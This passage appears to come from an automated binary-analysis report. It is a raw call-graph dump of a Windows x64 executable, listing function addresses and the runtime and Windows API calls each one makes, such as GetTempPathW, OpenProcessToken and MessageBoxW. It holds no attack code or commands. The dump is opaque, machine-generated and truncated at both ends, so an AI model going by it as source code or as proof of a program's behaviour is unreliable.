16329->16372 17047 7ff7b2b706d4 16329->17047 16330->16122 16330->16123 16332 7ff7b2b7004c 74 API calls 16332->16326 16333 7ff7b2b619e5 16334 7ff7b2b61a08 16333->16334 16335 7ff7b2b619e9 16333->16335 17051 7ff7b2b7039c 16334->17051 16336 7ff7b2b74f08 _get_daylight 11 API calls 16335->16336 16338 7ff7b2b619ee 16336->16338 17054 7ff7b2b62910 16338->17054 16341 7ff7b2b61a26 16343 7ff7b2b74f08 _get_daylight 11 API calls 16341->16343 16342 7ff7b2b61a45 16346 7ff7b2b61a5c 16342->16346 16347 7ff7b2b61a7b 16342->16347 16344 7ff7b2b61a2b 16343->16344 16345 7ff7b2b62910 54 API calls 16344->16345 16345->16372 16348 7ff7b2b74f08 _get_daylight 11 API calls 16346->16348 16349 7ff7b2b61c80 49 API calls 16347->16349 16350 7ff7b2b61a61 16348->16350 16351 7ff7b2b61a92 16349->16351 16352 7ff7b2b62910 54 API calls 16350->16352 16353 7ff7b2b61c80 49 API calls 16351->16353 16352->16372 16354 7ff7b2b61add 16353->16354 16355 7ff7b2b706d4 73 API calls 16354->16355 16356 7ff7b2b61b01 16355->16356 16357 7ff7b2b61b16 16356->16357 16358 7ff7b2b61b35 16356->16358 16359 7ff7b2b74f08 _get_daylight 11 API calls 16357->16359 16360 7ff7b2b7039c _fread_nolock 53 API calls 16358->16360 16361 7ff7b2b61b1b 16359->16361 16362 7ff7b2b61b4a 16360->16362 16363 7ff7b2b62910 54 API calls 16361->16363 16364 7ff7b2b61b50 16362->16364 16365 7ff7b2b61b6f 16362->16365 16363->16372 16367 7ff7b2b74f08 _get_daylight 11 API calls 16364->16367 17069 7ff7b2b70110 16365->17069 16369 7ff7b2b61b55 16367->16369 16370 7ff7b2b62910 54 API calls 16369->16370 16370->16372 16371 7ff7b2b62710 54 API calls 16371->16372 16372->16332 16374 7ff7b2b6883a 16373->16374 16375 7ff7b2b69390 2 API calls 16374->16375 16376 7ff7b2b68859 GetEnvironmentVariableW 16375->16376 16377 7ff7b2b68876 ExpandEnvironmentStringsW 16376->16377 16378 7ff7b2b688c2 16376->16378 16377->16378 16379 7ff7b2b68898 16377->16379 16380 7ff7b2b6c550 _log10_special 8 API calls 16378->16380 16381 7ff7b2b69440 2 API calls 16379->16381 16382 7ff7b2b688d4 16380->16382 16383 7ff7b2b688aa 16381->16383 16382->16132 16384 7ff7b2b6c550 _log10_special 8 API calls 16383->16384 16385 7ff7b2b688ba 16384->16385 16385->16132 16387 7ff7b2b69390 2 API calls 16386->16387 16388 7ff7b2b6895c 16387->16388 16389 7ff7b2b69390 2 API calls 16388->16389 16390 7ff7b2b6896c 16389->16390 17287 7ff7b2b78238 16390->17287 16392 7ff7b2b6897a __std_exception_copy 16392->16173 16394 7ff7b2b690f5 16393->16394 17305 7ff7b2b68570 GetCurrentProcess OpenProcessToken 16394->17305 16397 7ff7b2b68570 7 API calls 16398 7ff7b2b69121 16397->16398 16399 7ff7b2b6913a 16398->16399 16400 7ff7b2b69154 16398->16400 16401 7ff7b2b626b0 48 API calls 16399->16401 16402 7ff7b2b626b0 48 API calls 16400->16402 16403 7ff7b2b69152 16401->16403 16404 7ff7b2b69167 LocalFree LocalFree 16402->16404 16403->16404 16405 7ff7b2b69183 16404->16405 16408 7ff7b2b6918f 16404->16408 17315 7ff7b2b62b50 16405->17315 16407 7ff7b2b6c550 _log10_special 8 API calls 16409 7ff7b2b63c55 16407->16409 16408->16407 16409->16178 16410 7ff7b2b68660 16409->16410 16411 7ff7b2b68678 16410->16411 16412 7ff7b2b6869c 16411->16412 16413 7ff7b2b686fa GetTempPathW GetCurrentProcessId 16411->16413 16415 7ff7b2b68830 14 API calls 16412->16415 17324 7ff7b2b625c0 16413->17324 16416 7ff7b2b686a8 16415->16416 17331 7ff7b2b681d0 16416->17331 16422 7ff7b2b68728 __std_exception_copy 16429 7ff7b2b68765 __std_exception_copy 16422->16429 17328 7ff7b2b78b68 16422->17328 16428 7ff7b2b6c550 _log10_special 8 API calls 16430 7ff7b2b63cbb 16428->16430 16434 7ff7b2b69390 2 API calls 16429->16434 16442 7ff7b2b687d4 __std_exception_copy 16429->16442 16430->16178 16430->16190 16435 7ff7b2b687b1 16434->16435 16436 7ff7b2b687e9 16435->16436 16437 7ff7b2b687b6 16435->16437 16442->16428 16444 7ff7b2b693b2 MultiByteToWideChar 16443->16444 16445 7ff7b2b693d6 16443->16445 16444->16445 16447 7ff7b2b693ec __std_exception_copy 16444->16447 16446 7ff7b2b693f3 MultiByteToWideChar 16445->16446 16445->16447 16446->16447 16447->16189 16460 7ff7b2b633ce __scrt_get_show_window_mode 16448->16460 16449 7ff7b2b6c550 _log10_special 8 API calls 16450 7ff7b2b63664 16449->16450 16450->16161 16467 7ff7b2b690c0 LocalFree 16450->16467 16451 7ff7b2b635c7 16451->16449 16453 7ff7b2b61c80 49 API calls 16453->16460 16454 7ff7b2b635e2 16456 7ff7b2b62710 54 API calls 16454->16456 16456->16451 16459 7ff7b2b635c9 16462 7ff7b2b62710 54 API calls 16459->16462 16460->16451 16460->16453 16460->16454 16460->16459 16461 7ff7b2b62a50 54 API calls 16460->16461 16465 7ff7b2b635d0 16460->16465 17602 7ff7b2b64560 16460->17602 17608 7ff7b2b67e20 16460->17608 17619 7ff7b2b61600 16460->17619 17667 7ff7b2b67120 16460->17667 17671 7ff7b2b64190 16460->17671 17715 7ff7b2b64450 16460->17715 16461->16460 16462->16451 16466 7ff7b2b62710 54 API calls 16465->16466 16466->16451 16469 7ff7b2b61ca5 16468->16469 16470 7ff7b2b74984 49 API calls 16469->16470 16471 7ff7b2b61cc8 16470->16471 16471->16127 16473 7ff7b2b69390 2 API calls 16472->16473 16474 7ff7b2b689b4 16473->16474 16475 7ff7b2b78238 38 API calls 16474->16475 16476 7ff7b2b689c6 __std_exception_copy 16475->16476 16476->16140 16478 7ff7b2b645cc 16477->16478 16479 7ff7b2b69390 2 API calls 16478->16479 16480 7ff7b2b645f4 16479->16480 16481 7ff7b2b69390 2 API calls 16480->16481 16482 7ff7b2b64607 16481->16482 17898 7ff7b2b75f94 16482->17898 16485 7ff7b2b6c550 _log10_special 8 API calls 16486 7ff7b2b6392b 16485->16486 16486->16130 16487 7ff7b2b67f90 16486->16487 16488 7ff7b2b67fb4 16487->16488 16489 7ff7b2b706d4 73 API calls 16488->16489 16492 7ff7b2b6808b __std_exception_copy 16488->16492 16490 7ff7b2b67fd0 16489->16490 16490->16492 18289 7ff7b2b778c8 16490->18289 16492->16134 16493 7ff7b2b706d4 73 API calls 16495 7ff7b2b67fe5 16493->16495 16494 7ff7b2b7039c _fread_nolock 53 API calls 16494->16495 16495->16492 16495->16493 16495->16494 16497 7ff7b2b7007c 16496->16497 18304 7ff7b2b6fe28 16497->18304 16499 7ff7b2b70095 16499->16130 16501 7ff7b2b6c850 16500->16501 16502 7ff7b2b62734 GetCurrentProcessId 16501->16502 16503 7ff7b2b61c80 49 API calls 16502->16503 16504 7ff7b2b62787 16503->16504 16505 7ff7b2b74984 49 API calls 16504->16505 16506 7ff7b2b627cf 16505->16506 16507 7ff7b2b62620 12 API calls 16506->16507 16508 7ff7b2b627f1 16507->16508 16509 7ff7b2b6c550 _log10_special 8 API calls 16508->16509 16510 7ff7b2b62801 16509->16510 16510->16161 16512 7ff7b2b61c80 49 API calls 16511->16512 16513 7ff7b2b644fd 16512->16513 16513->16172 16515 7ff7b2b61c80 49 API calls 16514->16515 16516 7ff7b2b64660 16515->16516 16516->16190 16518 7ff7b2b66dd5 16517->16518 16519 7ff7b2b63e6c 16518->16519 16520 7ff7b2b74f08 _get_daylight 11 API calls 16518->16520 16523 7ff7b2b67340 16519->16523 16521 7ff7b2b66de2 16520->16521 16522 7ff7b2b62910 54 API calls 16521->16522 16522->16519 18315 7ff7b2b61470 16523->18315 18421 7ff7b2b66360 16591->18421 16599 7ff7b2b63399 16611 7ff7b2b7546c EnterCriticalSection 16604->16611 16613 7ff7b2b636bc GetModuleFileNameW 16612->16613 16613->16304 16613->16305 16615 7ff7b2b692d2 16614->16615 16616 7ff7b2b692bf FindClose 16614->16616 16617 7ff7b2b6c550 _log10_special 8 API calls 16615->16617 16616->16615 16618 7ff7b2b6371a 16617->16618 16618->16310 16618->16311 16620 7ff7b2b6c850 16619->16620 16621 7ff7b2b62c70 GetCurrentProcessId 16620->16621 16650 7ff7b2b626b0 16621->16650 16623 7ff7b2b62cb9 16654 7ff7b2b74bd8 16623->16654 16626 7ff7b2b626b0 48 API calls 16627 7ff7b2b62d34 FormatMessageW 16626->16627 16629 7ff7b2b62d6d 16627->16629 16630 7ff7b2b62d7f MessageBoxW 16627->16630 16631 7ff7b2b626b0 48 API calls 16629->16631 16632 7ff7b2b6c550 _log10_special 8 API calls 16630->16632 16631->16630 16633 7ff7b2b62daf 16632->16633 16633->16308 16635 7ff7b2b69340 GetFinalPathNameByHandleW CloseHandle 16634->16635 16636 7ff7b2b63730 16634->16636 16635->16636 16636->16318 16636->16319 16638 7ff7b2b62834 16637->16638 16639 7ff7b2b626b0 48 API calls 16638->16639 16640 7ff7b2b62887 16639->16640 16641 7ff7b2b74bd8 48 API calls 16640->16641 16642 7ff7b2b628d0 MessageBoxW 16641->16642 16643 7ff7b2b6c550 _log10_special 8 API calls 16642->16643 16644 7ff7b2b62900 16643->16644 16644->16308 16646 7ff7b2b6946a WideCharToMultiByte 16645->16646 16649 7ff7b2b69495 16645->16649 16648 7ff7b2b694ab __std_exception_copy 16646->16648 16646->16649 16647 7ff7b2b694b2 WideCharToMultiByte 16647->16648 16648->16315 16649->16647 16649->16648 16651 7ff7b2b626d5 16650->16651 16652 7ff7b2b74bd8 48 API calls 16651->16652 16653 7ff7b2b626f8 16652->16653 16653->16623 16657 7ff7b2b74c32 16654->16657 16655 7ff7b2b74c57 16656 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16655->16656 16660 7ff7b2b74c81 16656->16660 16657->16655 16658 7ff7b2b74c93 16657->16658 16672 7ff7b2b72f90 16658->16672 16663 7ff7b2b6c550 _log10_special 8 API calls 16660->16663 16661 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16661->16660 16662 7ff7b2b74d40 16666 7ff7b2b74d74 16662->16666 16667 7ff7b2b74d49 16662->16667 16665 7ff7b2b62d04 16663->16665 16665->16626 16666->16661 16670 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16667->16670 16668 7ff7b2b74d9a 16668->16666 16669 7ff7b2b74da4 16668->16669 16671 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16669->16671 16670->16660 16671->16660 16673 7ff7b2b72fce 16672->16673 16674 7ff7b2b72fbe 16672->16674 16675 7ff7b2b72fd7 16673->16675 16679 7ff7b2b73005 16673->16679 16676 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16674->16676 16677 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16675->16677 16678 7ff7b2b72ffd 16676->16678 16677->16678 16678->16662 16678->16666 16678->16667 16678->16668 16679->16674 16679->16678 16683 7ff7b2b739a4 16679->16683 16716 7ff7b2b733f0 16679->16716 16753 7ff7b2b72b80 16679->16753 16684 7ff7b2b73a57 16683->16684 16685 7ff7b2b739e6 16683->16685 16688 7ff7b2b73a5c 16684->16688 16689 7ff7b2b73ab0 16684->16689 16686 7ff7b2b739ec 16685->16686 16687 7ff7b2b73a81 16685->16687 16690 7ff7b2b739f1 16686->16690 16691 7ff7b2b73a20 16686->16691 16776 7ff7b2b71d54 16687->16776 16692 7ff7b2b73a5e 16688->16692 16693 7ff7b2b73a91 16688->16693 16695 7ff7b2b73aba 16689->16695 16696 7ff7b2b73ac7 16689->16696 16700 7ff7b2b73abf 16689->16700 16690->16696 16698 7ff7b2b739f7 16690->16698 16691->16698 16691->16700 16694 7ff7b2b73a00 16692->16694 16703 7ff7b2b73a6d 16692->16703 16783 7ff7b2b71944 16693->16783 16715 7ff7b2b73af0 16694->16715 16756 7ff7b2b74158 16694->16756 16695->16687 16695->16700 16790 7ff7b2b746ac 16696->16790 16698->16694 16704 7ff7b2b73a32 16698->16704 16713 7ff7b2b73a1b 16698->16713 16700->16715 16794 7ff7b2b72164 16700->16794 16703->16687 16706 7ff7b2b73a72 16703->16706 16704->16715 16766 7ff7b2b74494 16704->16766 16706->16715 16772 7ff7b2b74558 16706->16772 16708 7ff7b2b6c550 _log10_special 8 API calls 16710 7ff7b2b73dea 16708->16710 16710->16679 16714 7ff7b2b73cdc 16713->16714 16713->16715 16801 7ff7b2b747c0 16713->16801 16714->16715 16807 7ff7b2b7ea08 16714->16807 16715->16708 16717 7ff7b2b733fe 16716->16717 16718 7ff7b2b73414 16716->16718 16720 7ff7b2b73a57 16717->16720 16721 7ff7b2b739e6 16717->16721 16741 7ff7b2b73454 16717->16741 16719 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16718->16719 16718->16741 16719->16741 16724 7ff7b2b73a5c 16720->16724 16725 7ff7b2b73ab0 16720->16725 16722 7ff7b2b739ec 16721->16722 16723 7ff7b2b73a81 16721->16723 16726 7ff7b2b739f1 16722->16726 16727 7ff7b2b73a20 16722->16727 16733 7ff7b2b71d54 38 API calls 16723->16733 16728 7ff7b2b73a5e 16724->16728 16729 7ff7b2b73a91 16724->16729 16731 7ff7b2b73aba 16725->16731 16732 7ff7b2b73ac7 16725->16732 16736 7ff7b2b73abf 16725->16736 16726->16732 16734 7ff7b2b739f7 16726->16734 16727->16734 16727->16736 16730 7ff7b2b73a00 16728->16730 16742 7ff7b2b73a6d 16728->16742 16738 7ff7b2b71944 38 API calls 16729->16738 16735 7ff7b2b74158 47 API calls 16730->16735 16752 7ff7b2b73af0 16730->16752 16731->16723 16731->16736 16737 7ff7b2b746ac 45 API calls 16732->16737 16750 7ff7b2b73a1b 16733->16750 16734->16730 16739 7ff7b2b73a32 16734->16739 16734->16750 16735->16750 16740 7ff7b2b72164 38 API calls 16736->16740 16736->16752 16737->16750 16738->16750 16743 7ff7b2b74494 46 API calls 16739->16743 16739->16752 16740->16750 16741->16679 16742->16723 16744 7ff7b2b73a72 16742->16744 16743->16750 16746 7ff7b2b74558 37 API calls 16744->16746 16744->16752 16745 7ff7b2b6c550 _log10_special 8 API calls 16747 7ff7b2b73dea 16745->16747 16746->16750 16747->16679 16748 7ff7b2b747c0 45 API calls 16751 7ff7b2b73cdc 16748->16751 16749 7ff7b2b7ea08 46 API calls 16749->16751 16750->16748 16750->16751 16750->16752 16751->16749 16751->16752 16752->16745 17030 7ff7b2b70fc8 16753->17030 16757 7ff7b2b7417e 16756->16757 16819 7ff7b2b70b80 16757->16819 16762 7ff7b2b742c3 16764 7ff7b2b747c0 45 API calls 16762->16764 16765 7ff7b2b74351 16762->16765 16763 7ff7b2b747c0 45 API calls 16763->16762 16764->16765 16765->16713 16767 7ff7b2b744c9 16766->16767 16768 7ff7b2b744e7 16767->16768 16769 7ff7b2b7450e 16767->16769 16770 7ff7b2b747c0 45 API calls 16767->16770 16771 7ff7b2b7ea08 46 API calls 16768->16771 16769->16713 16770->16768 16771->16769 16774 7ff7b2b74579 16772->16774 16773 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16775 7ff7b2b745aa 16773->16775 16774->16773 16774->16775 16775->16713 16777 7ff7b2b71d87 16776->16777 16778 7ff7b2b71db6 16777->16778 16780 7ff7b2b71e73 16777->16780 16782 7ff7b2b71df3 16778->16782 16962 7ff7b2b70c28 16778->16962 16781 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16780->16781 16781->16782 16782->16713 16784 7ff7b2b71977 16783->16784 16785 7ff7b2b719a6 16784->16785 16787 7ff7b2b71a63 16784->16787 16786 7ff7b2b70c28 12 API calls 16785->16786 16789 7ff7b2b719e3 16785->16789 16786->16789 16788 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16787->16788 16788->16789 16789->16713 16791 7ff7b2b746ef 16790->16791 16793 7ff7b2b746f3 __crtLCMapStringW 16791->16793 16970 7ff7b2b74748 16791->16970 16793->16713 16795 7ff7b2b72197 16794->16795 16796 7ff7b2b721c6 16795->16796 16798 7ff7b2b72283 16795->16798 16797 7ff7b2b70c28 12 API calls 16796->16797 16800 7ff7b2b72203 16796->16800 16797->16800 16799 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16798->16799 16799->16800 16800->16713 16802 7ff7b2b747d7 16801->16802 16974 7ff7b2b7d9b8 16802->16974 16809 7ff7b2b7ea39 16807->16809 16816 7ff7b2b7ea47 16807->16816 16808 7ff7b2b7ea67 16811 7ff7b2b7ea78 16808->16811 16812 7ff7b2b7ea9f 16808->16812 16809->16808 16810 7ff7b2b747c0 45 API calls 16809->16810 16809->16816 16810->16808 17020 7ff7b2b800a0 16811->17020 16814 7ff7b2b7eb2a 16812->16814 16815 7ff7b2b7eac9 16812->16815 16812->16816 16817 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 16814->16817 16815->16816 17023 7ff7b2b7f8a0 16815->17023 16816->16714 16817->16816 16820 7ff7b2b70bb7 16819->16820 16821 7ff7b2b70ba6 16819->16821 16820->16821 16849 7ff7b2b7d5fc 16820->16849 16827 7ff7b2b7e570 16821->16827 16824 7ff7b2b70bf8 16826 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16824->16826 16825 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16825->16824 16826->16821 16828 7ff7b2b7e58d 16827->16828 16829 7ff7b2b7e5c0 16827->16829 16830 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16828->16830 16829->16828 16831 7ff7b2b7e5f2 16829->16831 16839 7ff7b2b742a1 16830->16839 16832 7ff7b2b7e705 16831->16832 16844 7ff7b2b7e63a 16831->16844 16833 7ff7b2b7e7f7 16832->16833 16835 7ff7b2b7e7bd 16832->16835 16837 7ff7b2b7e78c 16832->16837 16838 7ff7b2b7e74f 16832->16838 16841 7ff7b2b7e745 16832->16841 16889 7ff7b2b7da5c 16833->16889 16882 7ff7b2b7ddf4 16835->16882 16875 7ff7b2b7e0d4 16837->16875 16865 7ff7b2b7e304 16838->16865 16839->16762 16839->16763 16841->16835 16843 7ff7b2b7e74a 16841->16843 16843->16837 16843->16838 16844->16839 16856 7ff7b2b7a4a4 16844->16856 16847 7ff7b2b7a900 _isindst 17 API calls 16848 7ff7b2b7e854 16847->16848 16850 7ff7b2b7d647 16849->16850 16854 7ff7b2b7d60b _get_daylight 16849->16854 16851 7ff7b2b74f08 _get_daylight 11 API calls 16850->16851 16853 7ff7b2b70be4 16851->16853 16852 7ff7b2b7d62e HeapAlloc 16852->16853 16852->16854 16853->16824 16853->16825 16854->16850 16854->16852 16855 7ff7b2b83590 _get_daylight 2 API calls 16854->16855 16855->16854 16857 7ff7b2b7a4b1 16856->16857 16859 7ff7b2b7a4bb 16856->16859 16857->16859 16863 7ff7b2b7a4d6 16857->16863 16858 7ff7b2b74f08 _get_daylight 11 API calls 16860 7ff7b2b7a4c2 16858->16860 16859->16858 16861 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 16860->16861 16862 7ff7b2b7a4ce 16861->16862 16862->16839 16862->16847 16863->16862 16864 7ff7b2b74f08 _get_daylight 11 API calls 16863->16864 16864->16860 16898 7ff7b2b840ac 16865->16898 16869 7ff7b2b7e3ac 16870 7ff7b2b7e401 16869->16870 16872 7ff7b2b7e3cc 16869->16872 16874 7ff7b2b7e3b0 16869->16874 16951 7ff7b2b7def0 16870->16951 16947 7ff7b2b7e1ac 16872->16947 16874->16839 16876 7ff7b2b840ac 38 API calls 16875->16876 16877 7ff7b2b7e11e 16876->16877 16878 7ff7b2b83af4 37 API calls 16877->16878 16879 7ff7b2b7e16e 16878->16879 16880 7ff7b2b7e172 16879->16880 16881 7ff7b2b7e1ac 45 API calls 16879->16881 16880->16839 16881->16880 16883 7ff7b2b840ac 38 API calls 16882->16883 16884 7ff7b2b7de3f 16883->16884 16885 7ff7b2b83af4 37 API calls 16884->16885 16886 7ff7b2b7de97 16885->16886 16887 7ff7b2b7de9b 16886->16887 16888 7ff7b2b7def0 45 API calls 16886->16888 16887->16839 16888->16887 16890 7ff7b2b7dad4 16889->16890 16891 7ff7b2b7daa1 16889->16891 16893 7ff7b2b7daec 16890->16893 16896 7ff7b2b7db6d 16890->16896 16892 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16891->16892 16895 7ff7b2b7dacd __scrt_get_show_window_mode 16892->16895 16894 7ff7b2b7ddf4 46 API calls 16893->16894 16894->16895 16895->16839 16896->16895 16897 7ff7b2b747c0 45 API calls 16896->16897 16897->16895 16899 7ff7b2b840ff fegetenv 16898->16899 16900 7ff7b2b87e2c 37 API calls 16899->16900 16903 7ff7b2b84152 16900->16903 16901 7ff7b2b8417f 16905 7ff7b2b7a4a4 __std_exception_copy 37 API calls 16901->16905 16902 7ff7b2b84242 16904 7ff7b2b87e2c 37 API calls 16902->16904 16903->16902 16908 7ff7b2b8421c 16903->16908 16909 7ff7b2b8416d 16903->16909 16906 7ff7b2b8426c 16904->16906 16907 7ff7b2b841fd 16905->16907 16910 7ff7b2b87e2c 37 API calls 16906->16910 16912 7ff7b2b85324 16907->16912 16917 7ff7b2b84205 16907->16917 16913 7ff7b2b7a4a4 __std_exception_copy 37 API calls 16908->16913 16909->16901 16909->16902 16911 7ff7b2b8427d 16910->16911 16914 7ff7b2b88020 20 API calls 16911->16914 16915 7ff7b2b7a900 _isindst 17 API calls 16912->16915 16913->16907 16921 7ff7b2b842e6 __scrt_get_show_window_mode 16914->16921 16916 7ff7b2b85339 16915->16916 16918 7ff7b2b6c550 _log10_special 8 API calls 16917->16918 16919 7ff7b2b7e351 16918->16919 16943 7ff7b2b83af4 16919->16943 16920 7ff7b2b84327 memcpy_s 16936 7ff7b2b84c6b memcpy_s __scrt_get_show_window_mode 16920->16936 16939 7ff7b2b84783 memcpy_s __scrt_get_show_window_mode 16920->16939 16921->16920 16922 7ff7b2b8468f __scrt_get_show_window_mode 16921->16922 16927 7ff7b2b74f08 _get_daylight 11 API calls 16921->16927 16923 7ff7b2b849cf 16924 7ff7b2b83c10 37 API calls 16923->16924 16930 7ff7b2b850e7 16924->16930 16925 7ff7b2b8497b 16925->16923 16926 7ff7b2b8533c memcpy_s 37 API calls 16925->16926 16926->16923 16928 7ff7b2b84760 16927->16928 16929 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 16928->16929 16929->16920 16931 7ff7b2b8533c memcpy_s 37 API calls 16930->16931 16941 7ff7b2b85142 16930->16941 16931->16941 16932 7ff7b2b852c8 16933 7ff7b2b87e2c 37 API calls 16932->16933 16933->16917 16934 7ff7b2b74f08 11 API calls _get_daylight 16934->16936 16935 7ff7b2b74f08 11 API calls _get_daylight 16935->16939 16936->16923 16936->16925 16936->16934 16942 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 16936->16942 16937 7ff7b2b83c10 37 API calls 16937->16941 16938 7ff7b2b7a8e0 37 API calls _invalid_parameter_noinfo 16938->16939 16939->16925 16939->16935 16939->16938 16940 7ff7b2b8533c memcpy_s 37 API calls 16940->16941 16941->16932 16941->16937 16941->16940 16942->16936 16944 7ff7b2b83b13 16943->16944 16945 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16944->16945 16946 7ff7b2b83b3e memcpy_s 16944->16946 16945->16946 16946->16869 16948 7ff7b2b7e1d8 memcpy_s 16947->16948 16949 7ff7b2b747c0 45 API calls 16948->16949 16950 7ff7b2b7e292 memcpy_s __scrt_get_show_window_mode 16948->16950 16949->16950 16950->16874 16952 7ff7b2b7df2b 16951->16952 16956 7ff7b2b7df78 memcpy_s 16951->16956 16953 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16952->16953 16954 7ff7b2b7df57 16953->16954 16954->16874 16955 7ff7b2b7dfe3 16957 7ff7b2b7a4a4 __std_exception_copy 37 API calls 16955->16957 16956->16955 16958 7ff7b2b747c0 45 API calls 16956->16958 16961 7ff7b2b7e025 memcpy_s 16957->16961 16958->16955 16959 7ff7b2b7a900 _isindst 17 API calls 16960 7ff7b2b7e0d0 16959->16960 16961->16959 16963 7ff7b2b70c5f 16962->16963 16969 7ff7b2b70c4e 16962->16969 16964 7ff7b2b7d5fc _fread_nolock 12 API calls 16963->16964 16963->16969 16965 7ff7b2b70c90 16964->16965 16966 7ff7b2b70ca4 16965->16966 16968 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16965->16968 16967 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16966->16967 16967->16969 16968->16966 16969->16782 16971 7ff7b2b7476e 16970->16971 16972 7ff7b2b74766 16970->16972 16971->16793 16973 7ff7b2b747c0 45 API calls 16972->16973 16973->16971 16975 7ff7b2b7d9d1 16974->16975 16977 7ff7b2b747ff 16974->16977 16975->16977 16982 7ff7b2b83304 16975->16982 16978 7ff7b2b7da24 16977->16978 16979 7ff7b2b7da3d 16978->16979 16980 7ff7b2b7480f 16978->16980 16979->16980 17017 7ff7b2b82650 16979->17017 16980->16714 16994 7ff7b2b7b150 GetLastError 16982->16994 16985 7ff7b2b8335e 16985->16977 16995 7ff7b2b7b174 FlsGetValue 16994->16995 16996 7ff7b2b7b191 FlsSetValue 16994->16996 16997 7ff7b2b7b18b 16995->16997 16998 7ff7b2b7b181 16995->16998 16996->16998 16999 7ff7b2b7b1a3 16996->16999 16997->16996 17000 7ff7b2b7b1fd SetLastError 16998->17000 17001 7ff7b2b7eb98 _get_daylight 11 API calls 16999->17001 17003 7ff7b2b7b21d 17000->17003 17004 7ff7b2b7b20a 17000->17004 17002 7ff7b2b7b1b2 17001->17002 17006 7ff7b2b7b1d0 FlsSetValue 17002->17006 17007 7ff7b2b7b1c0 FlsSetValue 17002->17007 17005 7ff7b2b7a504 __CxxCallCatchBlock 38 API calls 17003->17005 17004->16985 17016 7ff7b2b802d8 EnterCriticalSection 17004->17016 17008 7ff7b2b7b222 17005->17008 17010 7ff7b2b7b1ee 17006->17010 17011 7ff7b2b7b1dc FlsSetValue 17006->17011 17009 7ff7b2b7b1c9 17007->17009 17012 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17009->17012 17013 7ff7b2b7aef4 _get_daylight 11 API calls 17010->17013 17011->17009 17012->16998 17014 7ff7b2b7b1f6 17013->17014 17015 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17014->17015 17015->17000 17018 7ff7b2b7b150 __CxxCallCatchBlock 45 API calls 17017->17018 17019 7ff7b2b82659 17018->17019 17026 7ff7b2b86d88 17020->17026 17025 7ff7b2b7f8a9 MultiByteToWideChar 17023->17025 17029 7ff7b2b86dec 17026->17029 17027 7ff7b2b6c550 _log10_special 8 API calls 17028 7ff7b2b800bd 17027->17028 17028->16816 17029->17027 17031 7ff7b2b70ffd 17030->17031 17032 7ff7b2b7100f 17030->17032 17033 7ff7b2b74f08 _get_daylight 11 API calls 17031->17033 17035 7ff7b2b7101d 17032->17035 17039 7ff7b2b71059 17032->17039 17034 7ff7b2b71002 17033->17034 17036 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17034->17036 17037 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17035->17037 17046 7ff7b2b7100d 17036->17046 17037->17046 17038 7ff7b2b713d5 17040 7ff7b2b74f08 _get_daylight 11 API calls 17038->17040 17038->17046 17039->17038 17041 7ff7b2b74f08 _get_daylight 11 API calls 17039->17041 17042 7ff7b2b71669 17040->17042 17043 7ff7b2b713ca 17041->17043 17044 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17042->17044 17045 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17043->17045 17044->17046 17045->17038 17046->16679 17048 7ff7b2b70704 17047->17048 17075 7ff7b2b70464 17048->17075 17050 7ff7b2b7071d 17050->16333 17087 7ff7b2b703bc 17051->17087 17055 7ff7b2b6c850 17054->17055 17056 7ff7b2b62930 GetCurrentProcessId 17055->17056 17057 7ff7b2b61c80 49 API calls 17056->17057 17058 7ff7b2b62979 17057->17058 17101 7ff7b2b74984 17058->17101 17063 7ff7b2b61c80 49 API calls 17064 7ff7b2b629ff 17063->17064 17131 7ff7b2b62620 17064->17131 17067 7ff7b2b6c550 _log10_special 8 API calls 17068 7ff7b2b62a31 17067->17068 17068->16372 17070 7ff7b2b61b89 17069->17070 17071 7ff7b2b70119 17069->17071 17070->16371 17070->16372 17072 7ff7b2b74f08 _get_daylight 11 API calls 17071->17072 17073 7ff7b2b7011e 17072->17073 17074 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17073->17074 17074->17070 17076 7ff7b2b704ce 17075->17076 17077 7ff7b2b7048e 17075->17077 17076->17077 17078 7ff7b2b704da 17076->17078 17079 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 17077->17079 17086 7ff7b2b7546c EnterCriticalSection 17078->17086 17081 7ff7b2b704b5 17079->17081 17081->17050 17088 7ff7b2b61a20 17087->17088 17089 7ff7b2b703e6 17087->17089 17088->16341 17088->16342 17089->17088 17090 7ff7b2b703f5 __scrt_get_show_window_mode 17089->17090 17091 7ff7b2b70432 17089->17091 17094 7ff7b2b74f08 _get_daylight 11 API calls 17090->17094 17100 7ff7b2b7546c EnterCriticalSection 17091->17100 17095 7ff7b2b7040a 17094->17095 17097 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 17095->17097 17097->17088 17102 7ff7b2b749de 17101->17102 17103 7ff7b2b74a03 17102->17103 17105 7ff7b2b74a3f 17102->17105 17104 